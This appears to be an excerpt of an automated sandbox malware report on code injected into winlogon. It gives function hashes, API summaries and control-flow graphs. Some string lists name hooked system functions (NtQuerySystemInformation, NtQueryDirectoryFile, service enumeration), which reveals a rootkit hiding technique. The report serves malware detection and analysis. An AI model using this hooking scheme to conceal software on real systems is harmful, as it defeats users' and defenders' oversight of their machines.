                                                                      • Source File: 0000001F.00000002.2575301154.000001F385BC0000.00000040.00000001.00020000.00000000.sdmp, Offset: 000001F385BC0000, based on PE: true
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_31_2_1f385bc0000_winlogon.jbxd
                                                                      Similarity
                                                                      • API ID: Thread$Current$Context
                                                                      • String ID:
                                                                      • API String ID: 1666949209-0
                                                                      • Opcode ID: aba7c51250b0bd2785b454d2868164715ffdc60c22b63475f1bba81942d6465a
                                                                      • Instruction ID: a353196f63e3f686d0841e7f12a7e206c81323a03f893301661436a76609e4c4
                                                                      • Opcode Fuzzy Hash: aba7c51250b0bd2785b454d2868164715ffdc60c22b63475f1bba81942d6465a
                                                                      • Instruction Fuzzy Hash: 40D19A36205B4981DAB19B06E4913AA77A0F7D8BD5F140226EE9D47BE9DF3CCA41CB04
                                                                      Function 000001F385BC50D0 Relevance: 7.8, APIs: 5, Instructions: 318threadCOMMON
                                                                      Download Yara Rule

                                                                      Control-flow Graph

                                                                      • Executed
                                                                      • Not Executed
                                                                      control_flow_graph 129 1f385bc50d0-1f385bc50fc 130 1f385bc510d-1f385bc5116 129->130 131 1f385bc50fe-1f385bc5106 129->131 132 1f385bc5127-1f385bc5130 130->132 133 1f385bc5118-1f385bc5120 130->133 131->130 134 1f385bc5141-1f385bc514a 132->134 135 1f385bc5132-1f385bc513a 132->135 133->132 136 1f385bc514c-1f385bc5151 134->136 137 1f385bc5156-1f385bc5161 GetCurrentThreadId 134->137 135->134 138 1f385bc56d3-1f385bc56da 136->138 139 1f385bc516d-1f385bc5174 137->139 140 1f385bc5163-1f385bc5168 137->140 141 1f385bc5181-1f385bc518a 139->141 142 1f385bc5176-1f385bc517c 139->142 140->138 143 1f385bc518c-1f385bc5191 141->143 144 1f385bc5196-1f385bc51a2 141->144 142->138 143->138 145 1f385bc51ce-1f385bc5225 call 1f385bc56e0 * 2 144->145 146 1f385bc51a4-1f385bc51c9 144->146 151 1f385bc5227-1f385bc522e 145->151 152 1f385bc523a-1f385bc5243 145->152 146->138 153 1f385bc5230 151->153 154 1f385bc5236 151->154 155 1f385bc5255-1f385bc525e 152->155 156 1f385bc5245-1f385bc5252 152->156 157 1f385bc52b0-1f385bc52b6 153->157 158 1f385bc52a6-1f385bc52aa 154->158 159 1f385bc5260-1f385bc5270 155->159 160 1f385bc5273-1f385bc5298 call 1f385bc7870 155->160 156->155 161 1f385bc52b8-1f385bc52d4 call 1f385bc4390 157->161 162 1f385bc52e5-1f385bc52eb 157->162 158->157 159->160 170 1f385bc532d-1f385bc5342 call 1f385bc3cc0 160->170 171 1f385bc529e 160->171 161->162 172 1f385bc52d6-1f385bc52de 161->172 165 1f385bc52ed-1f385bc530c call 1f385bc78ac 162->165 166 1f385bc5315-1f385bc5328 162->166 165->166 166->138 176 1f385bc5351-1f385bc535a 170->176 177 1f385bc5344-1f385bc534c 170->177 171->158 172->162 178 1f385bc536c-1f385bc53ba call 1f385bc8c60 176->178 179 1f385bc535c-1f385bc5369 176->179 177->158 182 1f385bc53c2-1f385bc53ca 178->182 179->178 183 1f385bc53d0-1f385bc54bb call 1f385bc7440 182->183 184 1f385bc54d7-1f385bc54df 182->184 196 1f385bc54bf-1f385bc54ce call 1f385bc4060 183->196 197 1f385bc54bd 183->197 186 1f385bc54e1-1f385bc54f4 call 1f385bc4590 184->186 187 1f385bc5523-1f385bc552b 184->187 198 1f385bc54f8-1f385bc5521 186->198 199 1f385bc54f6 186->199 189 1f385bc552d-1f385bc5535 187->189 190 1f385bc5537-1f385bc5546 187->190 189->190 193 1f385bc5554-1f385bc5561 189->193 194 1f385bc554f 190->194 195 1f385bc5548 190->195 200 1f385bc5563 193->200 201 1f385bc5564-1f385bc55b9 call 1f385bc85c0 193->201 194->193 195->194 206 1f385bc54d0 196->206 207 1f385bc54d2 196->207 197->184 198->184 199->187 200->201 208 1f385bc55bb-1f385bc55c3 201->208 209 1f385bc55c8-1f385bc5661 call 1f385bc4510 call 1f385bc4470 VirtualProtect 201->209 206->184 207->182 214 1f385bc5671-1f385bc56d1 209->214 215 1f385bc5663-1f385bc5668 GetLastError 209->215 214->138 215->214
                                                                      APIs
                                                                      Memory Dump Source
                                                                      • Source File: 0000001F.00000002.2575301154.000001F385BC0000.00000040.00000001.00020000.00000000.sdmp, Offset: 000001F385BC0000, based on PE: true
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_31_2_1f385bc0000_winlogon.jbxd
                                                                      Similarity
                                                                      • API ID: CurrentThread
                                                                      • String ID:
                                                                      • API String ID: 2882836952-0
                                                                      • Opcode ID: a9eeae0eee8a65d3360f20c0190c6c2044be682fe56af66e10426f66e33a6bd7
                                                                      • Instruction ID: 48e9b6394c2e16e0435a437a14de86af20b7fc3907a494e4619b9524de145d43
                                                                      • Opcode Fuzzy Hash: a9eeae0eee8a65d3360f20c0190c6c2044be682fe56af66e10426f66e33a6bd7
                                                                      • Instruction Fuzzy Hash: 0A02CA32219B8586EBA1CB55E4903AAB7A0F3D47D5F100125FA9E47BE8DF7CC944CB04
                                                                      Function 000001F385BC39E0 Relevance: 4.6, APIs: 3, Instructions: 64memoryCOMMON
                                                                      Download Yara Rule

                                                                      Control-flow Graph

                                                                      APIs
                                                                      Memory Dump Source
                                                                      • Source File: 0000001F.00000002.2575301154.000001F385BC0000.00000040.00000001.00020000.00000000.sdmp, Offset: 000001F385BC0000, based on PE: true
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_31_2_1f385bc0000_winlogon.jbxd
                                                                      Similarity
                                                                      • API ID: Virtual$AllocQuery
                                                                      • String ID:
                                                                      • API String ID: 31662377-0
                                                                      • Opcode ID: ad31f8c641c3994e4c662b42b06090e17ab0b09933d29211a4965d6dca603ca4
                                                                      • Instruction ID: e020fba28db42efb86b7b281ff6320db8e868d5782e8dd22b64bfe2f8f0cfe4e
                                                                      • Opcode Fuzzy Hash: ad31f8c641c3994e4c662b42b06090e17ab0b09933d29211a4965d6dca603ca4
                                                                      • Instruction Fuzzy Hash: 74314132219A8581EAB2DB15E0503AE66A0F3D87D4F500635F9DE46BECDF7DCB509B08
                                                                      Function 000001F385BC328C Relevance: 4.5, APIs: 3, Instructions: 43threadCOMMON
                                                                      Download Yara Rule

                                                                      Control-flow Graph

                                                                      APIs
                                                                      Memory Dump Source
                                                                      • Source File: 0000001F.00000002.2575301154.000001F385BC0000.00000040.00000001.00020000.00000000.sdmp, Offset: 000001F385BC0000, based on PE: true
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_31_2_1f385bc0000_winlogon.jbxd
                                                                      Similarity
                                                                      • API ID: Current$FileModuleNameProcessProtectThreadVirtual$CreateFindHandlePath
                                                                      • String ID:
                                                                      • API String ID: 1683269324-0
                                                                      • Opcode ID: c94412c55dcd243bcd3fbe265bea19663896af10ab27123b85acb7154d5eea14
                                                                      • Instruction ID: 64b7ee1ffacfb3a96812083a67adc2b6f64ddc7d970daca41989523910d28d47
                                                                      • Opcode Fuzzy Hash: c94412c55dcd243bcd3fbe265bea19663896af10ab27123b85acb7154d5eea14
                                                                      • Instruction Fuzzy Hash: 52115E3061060382FBE6AB64E8457F92294A7F43E5F944334BD26825D9EF7DCA449208
                                                                      Function 000001F385BC4DF0 Relevance: 4.5, APIs: 3, Instructions: 23memoryCOMMON
                                                                      Download Yara Rule

                                                                      Control-flow Graph

                                                                      APIs
                                                                      Memory Dump Source
                                                                      • Source File: 0000001F.00000002.2575301154.000001F385BC0000.00000040.00000001.00020000.00000000.sdmp, Offset: 000001F385BC0000, based on PE: true
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_31_2_1f385bc0000_winlogon.jbxd
                                                                      Similarity
                                                                      • API ID: CacheCurrentFlushInstructionProcessProtectVirtual
                                                                      • String ID:
                                                                      • API String ID: 3733156554-0
                                                                      • Opcode ID: efc513032ac2f8104d68ff6d1779eae6f51007478eb3e1ac0120cc0a77f626c8
                                                                      • Instruction ID: 4724cafcdfdbfa4d6616eb3151ddc47c4ed22c72909894bd528e3ad7df338f73
                                                                      • Opcode Fuzzy Hash: efc513032ac2f8104d68ff6d1779eae6f51007478eb3e1ac0120cc0a77f626c8
                                                                      • Instruction Fuzzy Hash: CAF03036218B05C0D6B1DB01E4417AA6BA0F7D87F4F140225FE9D43BADCA3CCB848B44
                                                                      Function 000001F385B9273C Relevance: 3.2, APIs: 2, Instructions: 187memorylibraryCOMMON
                                                                      Download Yara Rule

                                                                      Control-flow Graph

                                                                      • Executed
                                                                      • Not Executed
                                                                      control_flow_graph 263 1f385b9273c-1f385b927a4 call 1f385b929d4 * 4 272 1f385b929b2 263->272 273 1f385b927aa-1f385b927ad 263->273 275 1f385b929b4-1f385b929d0 272->275 273->272 274 1f385b927b3-1f385b927b6 273->274 274->272 276 1f385b927bc-1f385b927bf 274->276 276->272 277 1f385b927c5-1f385b927e6 VirtualAlloc 276->277 277->272 278 1f385b927ec-1f385b9280c 277->278 279 1f385b9280e-1f385b92836 278->279 280 1f385b92838-1f385b9283f 278->280 279->279 279->280 281 1f385b928df-1f385b928e6 280->281 282 1f385b92845-1f385b92852 280->282 283 1f385b928ec-1f385b92901 281->283 284 1f385b92992-1f385b929b0 281->284 282->281 285 1f385b92858-1f385b9286a LoadLibraryA 282->285 283->284 286 1f385b92907 283->286 284->275 287 1f385b9286c-1f385b92878 285->287 288 1f385b928ca-1f385b928d2 285->288 291 1f385b9290d-1f385b92921 286->291 292 1f385b928c5-1f385b928c8 287->292 288->285 289 1f385b928d4-1f385b928d9 288->289 289->281 294 1f385b92982-1f385b9298c 291->294 295 1f385b92923-1f385b92934 291->295 292->288 293 1f385b9287a-1f385b9287d 292->293 299 1f385b9287f-1f385b928a5 293->299 300 1f385b928a7-1f385b928b7 293->300 294->284 294->291 297 1f385b9293f-1f385b92943 295->297 298 1f385b92936-1f385b9293d 295->298 303 1f385b9294d-1f385b92951 297->303 304 1f385b92945-1f385b9294b 297->304 302 1f385b92970-1f385b92980 298->302 301 1f385b928ba-1f385b928c1 299->301 300->301 301->292 302->294 302->295 305 1f385b92963-1f385b92967 303->305 306 1f385b92953-1f385b92961 303->306 304->302 305->302 308 1f385b92969-1f385b9296c 305->308 306->302 308->302
                                                                      APIs
                                                                      Memory Dump Source
                                                                      • Source File: 0000001F.00000002.2575121677.000001F385B90000.00000040.00000001.00020000.00000000.sdmp, Offset: 000001F385B90000, based on PE: true
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_31_2_1f385b90000_winlogon.jbxd
                                                                      Similarity
                                                                      • API ID: AllocLibraryLoadVirtual
                                                                      • String ID:
                                                                      • API String ID: 3550616410-0
                                                                      • Opcode ID: 8c1c9448f3dd1088c887dafc1273d9eb4da1e6d2ce59199f574756fa2a1f07a1
                                                                      • Instruction ID: c04cbf0e898960135302cb09ad6b63cbc2f212c8dd94948b103ddf5d24b099a9
                                                                      • Opcode Fuzzy Hash: 8c1c9448f3dd1088c887dafc1273d9eb4da1e6d2ce59199f574756fa2a1f07a1
                                                                      • Instruction Fuzzy Hash: 9E61C136F0169287DF958F6590407B9F392FBA4BA4F948231EE69077C8EB38D952C700
                                                                      Function 000001F385BC1ABC Relevance: 3.1, APIs: 2, Instructions: 68sleepCOMMON
                                                                      Download Yara Rule

                                                                      Control-flow Graph

                                                                      APIs
                                                                        • Part of subcall function 000001F385BC1628: GetProcessHeap.KERNEL32 ref: 000001F385BC1633
                                                                        • Part of subcall function 000001F385BC1628: HeapAlloc.KERNEL32 ref: 000001F385BC1642
                                                                        • Part of subcall function 000001F385BC1628: RegOpenKeyExW.ADVAPI32 ref: 000001F385BC16B2
                                                                        • Part of subcall function 000001F385BC1628: RegOpenKeyExW.ADVAPI32 ref: 000001F385BC16DF
                                                                        • Part of subcall function 000001F385BC1628: RegCloseKey.ADVAPI32 ref: 000001F385BC16F9
                                                                        • Part of subcall function 000001F385BC1628: RegOpenKeyExW.ADVAPI32 ref: 000001F385BC1719
                                                                        • Part of subcall function 000001F385BC1628: RegCloseKey.ADVAPI32 ref: 000001F385BC1734
                                                                        • Part of subcall function 000001F385BC1628: RegOpenKeyExW.ADVAPI32 ref: 000001F385BC1754
                                                                        • Part of subcall function 000001F385BC1628: RegCloseKey.ADVAPI32 ref: 000001F385BC176F
                                                                        • Part of subcall function 000001F385BC1628: RegOpenKeyExW.ADVAPI32 ref: 000001F385BC178F
                                                                        • Part of subcall function 000001F385BC1628: RegCloseKey.ADVAPI32 ref: 000001F385BC17AA
                                                                        • Part of subcall function 000001F385BC1628: RegOpenKeyExW.ADVAPI32 ref: 000001F385BC17CA
                                                                      • Sleep.KERNEL32 ref: 000001F385BC1AD7
                                                                      • SleepEx.KERNELBASE ref: 000001F385BC1ADD
                                                                        • Part of subcall function 000001F385BC1628: RegCloseKey.ADVAPI32 ref: 000001F385BC17E5
                                                                        • Part of subcall function 000001F385BC1628: RegOpenKeyExW.ADVAPI32 ref: 000001F385BC1805
                                                                        • Part of subcall function 000001F385BC1628: RegCloseKey.ADVAPI32 ref: 000001F385BC1820
                                                                        • Part of subcall function 000001F385BC1628: RegOpenKeyExW.ADVAPI32 ref: 000001F385BC1840
                                                                        • Part of subcall function 000001F385BC1628: RegCloseKey.ADVAPI32 ref: 000001F385BC185B
                                                                        • Part of subcall function 000001F385BC1628: RegOpenKeyExW.ADVAPI32 ref: 000001F385BC187B
                                                                        • Part of subcall function 000001F385BC1628: RegCloseKey.ADVAPI32 ref: 000001F385BC1896
                                                                        • Part of subcall function 000001F385BC1628: RegCloseKey.ADVAPI32 ref: 000001F385BC18A0
                                                                      Memory Dump Source
                                                                      • Source File: 0000001F.00000002.2575301154.000001F385BC0000.00000040.00000001.00020000.00000000.sdmp, Offset: 000001F385BC0000, based on PE: true
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_31_2_1f385bc0000_winlogon.jbxd
                                                                      Similarity
                                                                      • API ID: CloseOpen$HeapSleep$AllocProcess
                                                                      • String ID:
                                                                      • API String ID: 1534210851-0
                                                                      • Opcode ID: ad614115fa5d2181ccf7742c52f053f5bbac07b16a2f1961ccdf1ed8f9939afa
                                                                      • Instruction ID: 10bcb2d6682a129b921ec7b08a8e6ea337be82993633d3c01402af06af3f6023
                                                                      • Opcode Fuzzy Hash: ad614115fa5d2181ccf7742c52f053f5bbac07b16a2f1961ccdf1ed8f9939afa
                                                                      • Instruction Fuzzy Hash: 8731FF7120164341FFD69B26D6413F953A4ABE4BF0F045631BE3AA73DDEE28CE518614
                                                                      Function 000001F385BF273C Relevance: 1.4, APIs: 1, Instructions: 187memoryCOMMON
                                                                      Download Yara Rule

                                                                      Control-flow Graph

                                                                      • Executed
                                                                      • Not Executed
                                                                      control_flow_graph 348 1f385bf273c-1f385bf27a4 call 1f385bf29d4 * 4 357 1f385bf29b2 348->357 358 1f385bf27aa-1f385bf27ad 348->358 360 1f385bf29b4-1f385bf29d0 357->360 358->357 359 1f385bf27b3-1f385bf27b6 358->359 359->357 361 1f385bf27bc-1f385bf27bf 359->361 361->357 362 1f385bf27c5-1f385bf27e6 VirtualAlloc 361->362 362->357 363 1f385bf27ec-1f385bf280c 362->363 364 1f385bf280e-1f385bf2836 363->364 365 1f385bf2838-1f385bf283f 363->365 364->364 364->365 366 1f385bf28df-1f385bf28e6 365->366 367 1f385bf2845-1f385bf2852 365->367 368 1f385bf2992-1f385bf29b0 366->368 369 1f385bf28ec-1f385bf2901 366->369 367->366 370 1f385bf2858-1f385bf286a 367->370 368->360 369->368 371 1f385bf2907 369->371 375 1f385bf286c-1f385bf2878 370->375 376 1f385bf28ca-1f385bf28d2 370->376 373 1f385bf290d-1f385bf2921 371->373 377 1f385bf2982-1f385bf298c 373->377 378 1f385bf2923-1f385bf2934 373->378 379 1f385bf28c5-1f385bf28c8 375->379 376->370 380 1f385bf28d4-1f385bf28d9 376->380 377->368 377->373 382 1f385bf293f-1f385bf2943 378->382 383 1f385bf2936-1f385bf293d 378->383 379->376 387 1f385bf287a-1f385bf287d 379->387 380->366 385 1f385bf294d-1f385bf2951 382->385 386 1f385bf2945-1f385bf294b 382->386 384 1f385bf2970-1f385bf2980 383->384 384->377 384->378 390 1f385bf2963-1f385bf2967 385->390 391 1f385bf2953-1f385bf2961 385->391 386->384 388 1f385bf287f-1f385bf28a5 387->388 389 1f385bf28a7-1f385bf28b7 387->389 392 1f385bf28ba-1f385bf28c1 388->392 389->392 390->384 393 1f385bf2969-1f385bf296c 390->393 391->384 392->379 393->384
                                                                      APIs
                                                                      Memory Dump Source
                                                                      • Source File: 0000001F.00000002.2575560099.000001F385BF0000.00000040.00000400.00020000.00000000.sdmp, Offset: 000001F385BF0000, based on PE: true
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_31_2_1f385bf0000_winlogon.jbxd
                                                                      Similarity
                                                                      • API ID: AllocVirtual
                                                                      • String ID:
                                                                      • API String ID: 4275171209-0
                                                                      • Opcode ID: 8c1c9448f3dd1088c887dafc1273d9eb4da1e6d2ce59199f574756fa2a1f07a1
                                                                      • Instruction ID: ef4c410e6d960397a7e29bb07b90f3ccf10a3190337873fb1e91f7c74c59de08
                                                                      • Opcode Fuzzy Hash: 8c1c9448f3dd1088c887dafc1273d9eb4da1e6d2ce59199f574756fa2a1f07a1
                                                                      • Instruction Fuzzy Hash: F061E632B0165187DF958F95A8007B9B392FBA4BE4F948235EE69877C8DA38D952C700

                                                                      Non-executed Functions

                                                                      Function 000001F385BC2B2C Relevance: 14.3, APIs: 5, Strings: 3, Instructions: 264stringlibraryloaderCOMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 0000001F.00000002.2575301154.000001F385BC0000.00000040.00000001.00020000.00000000.sdmp, Offset: 000001F385BC0000, based on PE: true
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_31_2_1f385bc0000_winlogon.jbxd
                                                                      Similarity
                                                                      • API ID: lstrlen$FileHandleModuleName$AddressCloseFindOpenPathProcProcess
                                                                      • String ID: NtQueryObject$\Device\Nsi$ntdll.dll
                                                                      • API String ID: 2119608203-3850299575
                                                                      • Opcode ID: 9c3d18d3d08cd52b53439cd9635d78b514e0dbb1c6aaf52094b9259375ebc022
                                                                      • Instruction ID: 3e014252695f0c00fb7a0bb71849fee8b47a642a1c148055653ae182c2af6344
                                                                      • Opcode Fuzzy Hash: 9c3d18d3d08cd52b53439cd9635d78b514e0dbb1c6aaf52094b9259375ebc022
                                                                      • Instruction Fuzzy Hash: 54B1807221065282EF9A9F65C4407F9A3A4F7A5BE4F445226FEA9637D8DF38CE40C344
                                                                      Function 000001F385BC7D90 Relevance: 10.6, APIs: 7, Instructions: 72COMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                      Memory Dump Source
                                                                      • Source File: 0000001F.00000002.2575301154.000001F385BC0000.00000040.00000001.00020000.00000000.sdmp, Offset: 000001F385BC0000, based on PE: true
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_31_2_1f385bc0000_winlogon.jbxd
                                                                      Similarity
                                                                      • API ID: ExceptionFilterPresentUnhandled$CaptureContextDebuggerEntryFeatureFunctionLookupProcessorUnwindVirtual
                                                                      • String ID:
                                                                      • API String ID: 3140674995-0
                                                                      • Opcode ID: 781d1b9bde8934adc12bfa83d35ad1be64d2520f1bd2f9e02f1b4bb1ea1a0257
                                                                      • Instruction ID: e0b9b7052118a7287e8f390f34dccee8bc25c43afc6201edd398442163f3e76f
                                                                      • Opcode Fuzzy Hash: 781d1b9bde8934adc12bfa83d35ad1be64d2520f1bd2f9e02f1b4bb1ea1a0257
                                                                      • Instruction Fuzzy Hash: 43315D72205B818AEBA19F64E8403EE7364F795794F44413AEE5D47B98EF3CCA48C714
                                                                      Function 000001F385BCD2A4 Relevance: 9.1, APIs: 6, Instructions: 83COMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                      Memory Dump Source
                                                                      • Source File: 0000001F.00000002.2575301154.000001F385BC0000.00000040.00000001.00020000.00000000.sdmp, Offset: 000001F385BC0000, based on PE: true
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_31_2_1f385bc0000_winlogon.jbxd
                                                                      Similarity
                                                                      • API ID: ExceptionFilterUnhandled$CaptureContextDebuggerEntryFunctionLookupPresentUnwindVirtual
                                                                      • String ID:
                                                                      • API String ID: 1239891234-0
                                                                      • Opcode ID: 056b8809331e045eb0ff6df28b8a67c6be047fb713c0be5e5acd4a9b147221bc
                                                                      • Instruction ID: 119532e0019eb03a6f85644e89c7b11ad2598611322a358013ebae4ac99bf1c6
                                                                      • Opcode Fuzzy Hash: 056b8809331e045eb0ff6df28b8a67c6be047fb713c0be5e5acd4a9b147221bc
                                                                      • Instruction Fuzzy Hash: E2310B36214B818ADBA18F25E8403EE63A4F7D97A4F540225FEAD47B99DF3CC6558B00
                                                                      Function 000001F385BC7960 Relevance: 6.0, APIs: 4, Instructions: 39timethreadCOMMONLIBRARYCODE
                                                                      Download Yara Rule
                                                                      APIs
                                                                      Memory Dump Source
                                                                      • Source File: 0000001F.00000002.2575301154.000001F385BC0000.00000040.00000001.00020000.00000000.sdmp, Offset: 000001F385BC0000, based on PE: true
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_31_2_1f385bc0000_winlogon.jbxd
                                                                      Similarity
                                                                      • API ID: CurrentTime$CounterFilePerformanceProcessQuerySystemThread
                                                                      • String ID:
                                                                      • API String ID: 2933794660-0
                                                                      • Opcode ID: 561ac6f4885ef0f33bff27beb4ddb95e6a253367b5c72fac45fcb4617ca9122b
                                                                      • Instruction ID: 886ad51172aaf13e8012940450bcb762d4a0f855fb16cb69d876ae1c8491be24
                                                                      • Opcode Fuzzy Hash: 561ac6f4885ef0f33bff27beb4ddb95e6a253367b5c72fac45fcb4617ca9122b
                                                                      • Instruction Fuzzy Hash: D5111F32750B0289EF81CF60E8553A833A4F7697A8F441E35EE6D47799DB7CC6988380
                                                                      Function 000001F385BCDCE0 Relevance: 1.6, APIs: 1, Instructions: 149COMMON
                                                                      Download Yara Rule
                                                                      Memory Dump Source
                                                                      • Source File: 0000001F.00000002.2575301154.000001F385BC0000.00000040.00000001.00020000.00000000.sdmp, Offset: 000001F385BC0000, based on PE: true
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_31_2_1f385bc0000_winlogon.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: 29975c57d01bdb1e687cc302dc7d7dc5a8663a128fa1f3b93342ad94a271d3ec
                                                                      • Instruction ID: 0ab57e8a41362360b4c2b69986fe903eab220494ac42150a3405ac5a4fa8be70
                                                                      • Opcode Fuzzy Hash: 29975c57d01bdb1e687cc302dc7d7dc5a8663a128fa1f3b93342ad94a271d3ec
                                                                      • Instruction Fuzzy Hash: AD51C5367006C189FB619B72A8407EA7BA5F7947E4F144225FE6867BDDDA3CCA01C704
                                                                      Function 000001F385BA36F0 Relevance: .0, Instructions: 32COMMON
                                                                      Download Yara Rule
                                                                      Memory Dump Source
                                                                      • Source File: 0000001F.00000002.2575121677.000001F385B90000.00000040.00000001.00020000.00000000.sdmp, Offset: 000001F385B90000, based on PE: true
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_31_2_1f385b90000_winlogon.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: 06df2142d5dd0183fd0e01b7d5608ecb5bc0210788fa76ce78b9fbce82fbb0aa
                                                                      • Instruction ID: 6dd60b39cab2d84fa712c6e0a873e69cabff84c93a7a43a81c19e979f1af2cba
                                                                      • Opcode Fuzzy Hash: 06df2142d5dd0183fd0e01b7d5608ecb5bc0210788fa76ce78b9fbce82fbb0aa
                                                                      • Instruction Fuzzy Hash: 7AF068717152558EEFD98F68A40276977D1F3583D0FD08129EA9A83B48D27C8150CF04
                                                                      Function 000001F385BC12BC Relevance: 26.4, APIs: 14, Strings: 1, Instructions: 120memoryregistrystringCOMMON
                                                                      Download Yara Rule

                                                                      Control-flow Graph

                                                                      APIs
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 0000001F.00000002.2575301154.000001F385BC0000.00000040.00000001.00020000.00000000.sdmp, Offset: 000001F385BC0000, based on PE: true
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_31_2_1f385bc0000_winlogon.jbxd
                                                                      Similarity
                                                                      • API ID: Heap$Process$Alloc$Free$EnumInfoQueryValuelstrlen
                                                                      • String ID: d
                                                                      • API String ID: 2005889112-2564639436
                                                                      • Opcode ID: 8b653d2a3574a9b9f54f76d34c9bbade1314fe17b6e977058bb62b7e32ce9810
                                                                      • Instruction ID: b2b3583c4c13428535a8a1f942f546f92154c8786cef82e3cf051c49b1cbc2ed
                                                                      • Opcode Fuzzy Hash: 8b653d2a3574a9b9f54f76d34c9bbade1314fe17b6e977058bb62b7e32ce9810
                                                                      • Instruction Fuzzy Hash: 63515B32200B8686EB95CF62E4483AA77A1F7D9BE9F544234EE5907798DF3CC645CB00
                                                                      Function 000001F385BC1D14 Relevance: 22.8, APIs: 1, Strings: 12, Instructions: 65threadCOMMON
                                                                      Download Yara Rule

                                                                      Control-flow Graph

                                                                      APIs
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 0000001F.00000002.2575301154.000001F385BC0000.00000040.00000001.00020000.00000000.sdmp, Offset: 000001F385BC0000, based on PE: true
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_31_2_1f385bc0000_winlogon.jbxd
                                                                      Similarity
                                                                      • API ID: CurrentThread$AddressHandleModuleProc
                                                                      • String ID: EnumServiceGroupW$EnumServicesStatusExW$NtDeviceIoControlFile$NtEnumerateKey$NtEnumerateValueKey$NtQueryDirectoryFile$NtQueryDirectoryFileEx$NtQuerySystemInformation$NtResumeThread$advapi32.dll$ntdll.dll$sechost.dll
                                                                      • API String ID: 4175298099-1975688563
                                                                      • Opcode ID: 848021bf4701eae64bbfc749c93af06548ec6c37c79a2989ab503d46e0816dd6
                                                                      • Instruction ID: d595e3e3372c9b20bd3718418993cbc429e4e82f856070faa9de1b73c2b9a119
                                                                      • Opcode Fuzzy Hash: 848021bf4701eae64bbfc749c93af06548ec6c37c79a2989ab503d46e0816dd6
                                                                      • Instruction Fuzzy Hash: 9831877414098BA4EE87EFA5E8516F46321A7E43E4F844273BCB9122ED9E7C8B49C354
                                                                      Function 000001F385B96910 Relevance: 21.2, APIs: 8, Strings: 4, Instructions: 230COMMON
                                                                      Download Yara Rule

                                                                      Control-flow Graph

                                                                      • Executed
                                                                      • Not Executed
                                                                      control_flow_graph 454 1f385b96910-1f385b96916 455 1f385b96951-1f385b9695b 454->455 456 1f385b96918-1f385b9691b 454->456 459 1f385b96a78-1f385b96a8d 455->459 457 1f385b9691d-1f385b96920 456->457 458 1f385b96945-1f385b96984 call 1f385b96fc0 456->458 460 1f385b96922-1f385b96925 457->460 461 1f385b96938 __scrt_dllmain_crt_thread_attach 457->461 474 1f385b96a52 458->474 475 1f385b9698a-1f385b9699f call 1f385b96e54 458->475 462 1f385b96a9c-1f385b96ab6 call 1f385b96e54 459->462 463 1f385b96a8f 459->463 465 1f385b96931-1f385b96936 call 1f385b96f04 460->465 466 1f385b96927-1f385b96930 460->466 469 1f385b9693d-1f385b96944 461->469 477 1f385b96aef-1f385b96b20 call 1f385b97190 462->477 478 1f385b96ab8-1f385b96aed call 1f385b96f7c call 1f385b96e1c call 1f385b97318 call 1f385b97130 call 1f385b97154 call 1f385b96fac 462->478 467 1f385b96a91-1f385b96a9b 463->467 465->469 479 1f385b96a54-1f385b96a69 474->479 486 1f385b969a5-1f385b969b6 call 1f385b96ec4 475->486 487 1f385b96a6a-1f385b96a77 call 1f385b97190 475->487 488 1f385b96b22-1f385b96b28 477->488 489 1f385b96b31-1f385b96b37 477->489 478->467 506 1f385b969b8-1f385b969dc call 1f385b972dc call 1f385b96e0c call 1f385b96e38 call 1f385b9ac0c 486->506 507 1f385b96a07-1f385b96a11 call 1f385b97130 486->507 487->459 488->489 493 1f385b96b2a-1f385b96b2c 488->493 494 1f385b96b7e-1f385b96b94 call 1f385b9268c 489->494 495 1f385b96b39-1f385b96b43 489->495 500 1f385b96c1f-1f385b96c2c 493->500 515 1f385b96bcc-1f385b96bce 494->515 516 1f385b96b96-1f385b96b98 494->516 501 1f385b96b4f-1f385b96b5d call 1f385ba5780 495->501 502 1f385b96b45-1f385b96b4d 495->502 509 1f385b96b63-1f385b96b78 call 1f385b96910 501->509 519 1f385b96c15-1f385b96c1d 501->519 502->509 506->507 557 1f385b969de-1f385b969e5 __scrt_dllmain_after_initialize_c 506->557 507->474 527 1f385b96a13-1f385b96a1f call 1f385b97180 507->527 509->494 509->519 517 1f385b96bd0-1f385b96bd3 515->517 518 1f385b96bd5-1f385b96bea call 1f385b96910 515->518 516->515 524 1f385b96b9a-1f385b96bbc call 1f385b9268c call 1f385b96a78 516->524 517->518 517->519 518->519 536 1f385b96bec-1f385b96bf6 518->536 519->500 524->515 551 1f385b96bbe-1f385b96bc6 call 1f385ba5780 524->551 544 1f385b96a21-1f385b96a2b call 1f385b97098 527->544 545 1f385b96a45-1f385b96a50 527->545 541 1f385b96c01-1f385b96c11 call 1f385ba5780 536->541 542 1f385b96bf8-1f385b96bff 536->542 541->519 542->519 544->545 556 1f385b96a2d-1f385b96a3b 544->556 545->479 551->515 556->545 557->507 